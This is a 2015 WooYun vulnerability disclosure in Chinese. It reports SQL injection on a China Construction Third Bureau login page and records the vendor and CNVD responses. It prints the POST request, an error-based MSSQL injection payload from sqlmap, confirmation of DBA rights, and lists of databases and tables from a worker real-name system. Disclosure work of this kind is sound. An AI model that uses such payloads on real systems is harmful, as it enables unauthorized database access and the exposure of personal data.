当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0145403

漏洞标题:中建三局某站SQL注入漏洞(涉及60个数据库/DBA权限)

相关厂商:cncert国家互联网应急中心

漏洞作者: 路人甲

提交时间:2015-10-09 12:29

修复时间:2015-11-27 17:52

公开时间:2015-11-27 17:52

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-10-09: 细节已通知厂商并且等待厂商处理中
2015-10-13: 厂商已经确认,细节仅向厂商公开
2015-10-23: 细节向核心白帽子及相关领域专家公开
2015-11-02: 细节向普通白帽子公开
2015-11-12: 细节向实习白帽子公开
2015-11-27: 细节向公众公开

简要描述:

RT

详细说明:

URL:http://**.**.**.**:8012/login.aspx

11.png


测试注入:

POST /login.aspx HTTP/1.1
Host: **.**.**.**:8012
Proxy-Connection: keep-alive
Content-Length: 349
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://**.**.**.**:8012
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://**.**.**.**:8012/login.aspx
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
__VIEWSTATE=%2FwEPDwUKLTc4NTc0ODYxOWQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgIFDEltYWdlQnV0dG9uMgUMSW1hZ2VCdXR0b24xa3OD%2Bg4lEUPB%2BJsmGq%2FVMwgAOHQ
%3D&__VIEWSTATEGENERATOR=C2EE9ABB&__EVENTVALIDATION=%2FwEWBQLQ3t%2B6CwLs0bLrBgLs0fbZDALSwtXkAgLSwpnTCGEQxOOPY6dcOlWAgRH
%2BS1AJHtQk&TextBox1=admin&TextBox2=admin&ImageButton2.x=0&ImageButton2.y=0

漏洞证明:

数据库:

available databases [60]:
[*] 04F-MEP
[*] 1111
[*] 16F-MEP
[*] 5FBIM
[*] B1F
[*] BIMFIMBasic
[*] BIMFIMUserManage
[*] BJ_IKEA_B1_MEP
[*] CostManage
[*] CscecKq_GPRS
[*] HBDS01
[*] HBDS02
[*] JPS
[*] JPS-XT
[*] JZ
[*] master
[*] model
[*] MR2000DB
[*] msdb
[*] NT
[*] ProjectDocument
[*] ProjectDocument1
[*] ProjectDocument10
[*] ProjectDocument11
[*] ProjectDocument3
[*] ProjectDocument4
[*] ProjectDocument6
[*] ProjectDocument9
[*] QD
[*] RD
[*] ReportServer
[*] ReportServerTempDB
[*] RFD
[*] SH_SOHO_AS
[*] SH_SOHO_B1_AS
[*] SH_SOHO_B1_MEP
[*] SH_SOHO_B2_MEP
[*] SH_SOHO_B3_MEP
[*] tempdb
[*] WH_IKEA_GLF
[*] WH_IKEA_L10_LDJF
[*] WH_IKEA_L10A
[*] WH_IKEA_L10B
[*] WH_IKEA_L10C
[*] WH_IKEA_L11A
[*] WH_IKEA_L11B
[*] WH_IKEA_L11C
[*] WH_IKEA_L12A
[*] WH_IKEA_L12B
[*] WH_IKEA_L12C
[*] WH_IKEA_L13A
[*] WH_IKEA_L13B
[*] WH_IKEA_L13C
[*] WH_IKEA_L14C
[*] WH_IKEA_L15
[*] WH_JD_N4_CF
[*] Wul_DataAnalysis
[*] XFD
[*] XFS
[*] zk


权限:

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: TextBox1 (POST)
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: __VIEWSTATE=/wEPDwUKLTc4NTc0ODYxOWQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgIFDEltYWdlQnV0dG9uMgUMSW1hZ2VCdXR0b24xa3OD+g4lEUPB+JsmGq/VMwgAOHQ=&__VIEWSTATEGENERATOR=C2EE9ABB&__EVENTVALIDATION=/wEWBQLQ3t+6CwLs0bLrBgLs0fbZDALSwtXkAgLSwpnTCGEQxOOPY6dcOlWAgRH+S1AJHtQk&TextBox1=admin'+(SELECT 'wEcF' WHERE 1310=1310 AND 7705=CONVERT(INT,(SELECT CHAR(113)+CHAR(120)+CHAR(118)+CHAR(107)+CHAR(113)+(SELECT (CASE WHEN (7705=7705) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(98)+CHAR(113)+CHAR(122)+CHAR(113))))+'&TextBox2=admin&ImageButton2.x=0&ImageButton2.y=0
---
[19:45:57] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 or Vista
web application technology: ASP.NET, ASP.NET 2.0.50727, Microsoft IIS 7.0
back-end DBMS: Microsoft SQL Server 2008
[19:45:57] [INFO] testing if current user is DBA
current user is DBA: True
[19:45:57] [INFO] fetched data logged to text files under 'C:\Users\Administrator\.sqlmap\output\**.**.**.**'


CscecKq_GPRS:

[103 tables]
+---------------------------+
| ANQUANJISHU_JIAODI |
| AQHYI |
| AQHYI_SDEMP_COUNT |
| AQJSJD_SDEMP_COUNT |
| AQJSJD_YDEMP_COUNT |
| AQPX_TYPE |
| AQ_PX |
| AQ_PX_SDEMP_COUNT |
| BANZU |
| DB_BACKUP |
| Depart |
| DoorRightList |
| EMPLOYEE |
| EMP_BX |
| EMP_GLRY |
| EMP_GLRY_TYPE |
| EMP_GZ |
| EMP_HEIMINGDAN |
| EmpManage |
| FB_BASE |
| FB_BZ_EMP |
| FB_LIANXIREN |
| GANGWEI_BASE |
| GC_TYPE |
| GENZONG_ZHUTI |
| GS_User |
| GWZHIZE_XM |
| GZJS_TYPE |
| GZ_BASE |
| HB_UPLOADCONFIG |
| JCX_JY_SDEMP_COUNT |
| JCX_JY_YDEMP_COUNT |
| JG_XINGSHI |
| JINGCHANGX_AQJY |
| JUPD_DENGJI |
| JXCAQJY_TYPE |
| KQMACHINE_GL |
| LBLY_GL |
| LBLY_GL_MX |
| LBWUL_BASE |
| LOGIN_EMP |
| NICY_GLMS |
| QIYE_TYPE |
| QX_ENABLE |
| QX_FB_F_XM |
| QX_FENG_XM |
| QX_GROUP |
| QX_MAIN |
| QX_SUOSHUZU |
| QX_TZJMC |
| QX_XIANGMU |
| SANJI_AQJY_DJ |
| SYS_LOG |
| SYS_NEWS |
| TESHU_GZ_BASE |
| TZJMC |
| TZJMC_SET |
| T_KQ |
| XINXI_LAIYUAN |
| XM_BASE |
| YH_XINXI |
| ZHUZZHI_TYPE |
| ZIZHI_DENGJI |
| _GPRSKQ_DATAGET |
| _GPRS_Analys_Log |
| _GPRS_Communication |
| _GPRS_Communication_TMP |
| _GPRS_DoorControl_KongABC |
| _GPRS_DoorRightList |
| _GPRS_Employee_tmp |
| _GPRS_Error |
| _GPRS_FP_SendResult |
| _GPRS_Fp_fpData1 |
| _GPRS_Fp_fpData2 |
| _GPRS_Fp_fpData3 |
| _GPRS_Fp_fpData4 |
| _GPRS_Fp_fpIC |
| _GPRS_Fp_fpID |
| _GPRS_Fp_fpName |
| _GPRS_Fp_fpPwd |
| _GPRS_ID |
| _GPRS_ID_DoorControl |
| _GPRS_KQ_Data |
| _GPRS_KQ_Data_HIST |
| _GPRS_KQ_Data_HIST2 |
| _GPRS_KQ_Data_HIST3 |
| _GPRS_Language |
| _GPRS_UpTime |
| _GPRS_yuansdkjl |
| _GPRS_yuansdkjl_HIST |
| _GPRS_yuansdkjl_HIST2 |
| _GPRS_yuansdkjl_HIST3 |
| _KQCANSHU |
| _YL_Card |
| dtproperties |
| pbcatcol |
| pbcatedt |
| pbcatfmt |
| pbcattbl |
| pbcatvld |
| skySecCredit |
| tb_card_rec |
| tb_worker |
+---------------------------+

修复方案:

这个站主要是关于实名制信息管理系统,目测会泄露很多个人信息。介于数量量太大就没再进一步测试了。

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:8

确认时间:2015-10-13 17:51

厂商回复:

CNVD确认所述情况,已经转由CNCERT下发给湖北分中心,由其后续尝试协调网站管理单位处置(需建立新的工作联系).

最新状态:

暂无